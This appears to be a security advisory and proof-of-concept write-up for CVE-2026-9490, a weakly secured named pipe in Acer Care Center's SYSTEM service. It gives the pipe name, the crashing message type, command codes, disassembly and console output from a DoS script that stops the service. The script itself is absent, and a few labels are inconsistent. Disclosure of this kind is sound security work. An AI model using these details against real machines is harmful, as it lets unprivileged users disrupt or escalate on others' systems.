Share
## https://sploitus.com/exploit?id=5AA2C0E4-5A71-5861-B9A4-0FEF0CA28E28
**CVE ID:** CVE-2026-9490
**Researcher:** Vo Duc Thang (ugvxb)
## 1. Executive Summary
A critical security vulnerability has been identified in the Acer Care Center service (ACCSvc.exe). The vulnerability allows any authenticated local user to crash the system service (Denial of Service) and potentially escalate privileges through a weakly secured Named Pipe interface.
The service, which runs with SYSTEM privileges (LocalSystem), exposes a Named Pipe with overly permissive access controls that grant read, write, and execute permissions to all Authenticated Users.
---
## 2. Vulnerability Details
### 2.1 Affected Component
| Attribute | Value |
|-----------|-------|
| **Product** | Acer Care Center |
| **Component** | ACCSvc.exe (ACC Service) |
| **Service Name** | ACCSvc |
| **Installation Path** | C:\Program Files (x86)\Acer\Care Center\ |
| **Service Account** | LocalSystem (NT AUTHORITY\SYSTEM) |
| **Start Type** | AUTO_START |
| **Named Pipe** | \\.\pipe\treadstone_service_LightMode |
### 2.2 Vulnerability #1: Denial of Service
#### Description
The ACCSvc service creates a Named Pipe with a weak Security Descriptor that allows any authenticated user to connect and send messages. When a specially crafted message (message type 0x03) is sent to the pipe, the service crashes with exit code 1067 (ERROR_PROCESS_ABORTED).
#### Security Descriptor (SDDL)
```
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
```
#### SDDL Analysis
| ACE | Principal | Permission | Assessment |
|-----|-----------|------------|------------|
| (D;OICI;GA;;;BG) | Builtin Guests | DENY ALL | Secure |
| (D;OICI;GA;;;AN) | Anonymous | DENY ALL | Secure |
| (A;OICI;GRGWGX;;;AU) | Authenticated Users | Read/Write/Execute | **VULNERABLE** |
| (A;OICI;GA;;;BA) | Builtin Admins | ALLOW ALL | Expected |
#### Impact
A standard user without any special privileges can terminate the ACCSvc system service, causing Acer Care Center functionality to become unavailable.
### 2.3 Vulnerability #2: Potential Local Privilege Escalation
#### Description
The same weak Named Pipe ACL allows authenticated users to send command messages that trigger the service to execute launcher applications via CreateProcessAsUserW.
#### Command Codes
| Command | Hex Value | Target Executable |
|---------|-----------|-------------------|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
---
## 3. Technical Analysis
### 3.1 Binary Analysis
| Attribute | Value |
|-----------|-------|
| **File** | ACCSvc.exe |
| **Type** | PE32+ executable (console) x86-64 |
| **Analysis Tool** | Radare2 |
| **Entry Point** | 0x14000fd4c |
### 3.2 Key Functions Identified
| Function | Address | Purpose |
|----------|---------|---------|
| fcn.140009a70 | 0x140009a70 | CreateNamedPipeW - Creates vulnerable pipe |
| fcn.140007570 | 0x140007570 | CreateProcessAsUserW - Spawns processes |
| fcn.14000a8a0 | 0x14000a8a0 | ReadFile handler |
| fcn.140009950 | 0x140009950 | WriteFile handler |
| fcn.140008050 | 0x140008050 | Message dispatcher |
### 3.3 Named Pipe Creation Parameters
```
Pipe Name: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
```
### 3.4 Command Dispatch Logic
```asm
0x140008b1a mov ebx, dword [rdx + rcx] ; Read command
0x140008b1d lea eax, [rbx - 0x19065] ; Subtract base
0x140008b23 cmp eax, 2 ; Check range
0x140008b26 ja 0x140008bde ; Jump if invalid
```
---
### 4. Exploitation Results
```
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
```
**Result**: Standard user successfully crashed SYSTEM service!
---
## 5. Risk Assessment
### 5.1 CVSS v3.1 Score
| Metric | Value |
|--------|-------|
| **CVSS 4.0 Vector** |AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| **CVSS Base Score** | **6.8 (Medium)** |
### 5.2 CWE Classifications
| CWE ID | Name |
|--------|------|
| CWE-269 | Improper Privilege Management |
---
## 6. Disclaimer
This poc is for educational and authorized security research purposes only. The author is not responsible for any misuse. Exploitation without authorization is illegal.